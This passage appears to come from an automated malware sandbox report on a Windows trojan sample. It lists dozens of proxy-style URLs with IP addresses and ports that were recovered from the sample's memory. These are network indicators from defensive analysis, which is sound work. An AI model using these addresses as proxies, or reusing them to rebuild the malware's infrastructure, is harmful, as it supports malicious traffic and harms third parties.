                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8454000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.19.4.22:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.19.4.22:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.2.113:11223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.2.113:11223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC554000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC5CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.3.1:11223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.3.1:11223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.58.47:27890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.58.47:27890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.119.90:8443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.119.90:8443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.245:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.245:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.98:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.98:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.142:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.142:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.199:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.199:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77FE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.203.238.204:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.203.238.204:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.216:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.216:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.217:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.217:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.160.118:35010
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.160.118:35010://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C93BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.18.202:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C93BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.18.202:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.136.67:1337
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.136.67:1337://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.219.133.106:1234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.219.133.106:1234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.219.133.106:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.219.133.106:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.8.70:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.8.70:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.232.191
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.232.191://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.232.191:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB056000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.229.225.191:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.229.225.191:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.103:54244
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.103:54244://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:54625
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:54625://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C668F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:59946
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:59946://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.170:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.170:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.205:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C692A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.205:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.203.208:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.203.208:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.37.108:4443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.37.108:4443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD12C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.46.221:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.46.221:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.96
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.96://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.96:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.244.36.240:44087
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.244.36.240:44087://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.245.38.200:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.245.38.200:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.45.201:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.45.201:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80CA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.5.130:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C809D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.5.130:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.121:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.121:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA9D2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.129:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA9EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.129:8090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.131:8070
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.32.6.131:8070://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.111.1:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.111.1:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.40.80.143:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.40.80.143:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.249.148:39316
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.43.249.148:39316://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.194.176:29537
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.194.176:29537://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:25298
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:25298://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:31428
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:31428://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:53491
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.73.227:53491://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.30.5:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.30.5:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.31.207:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.31.207:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.5.209.101
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.5.209.101://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.5.209.101:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.51.92.103:51327
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.51.92.103:51327://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEE3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.54.0.18:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.54.0.18:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.54.178.193:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.54.178.193:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.6.10.191:19427
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.6.10.191:19427://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.61.169.67:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.61.169.67:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.65.253.161:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.65.253.161:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.66.59.203:42647
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.66.59.203:42647://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.89.156.130:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.89.156.130:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.89.181.212:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.89.181.212:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.95.227.244:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.95.227.244:4145://proxy
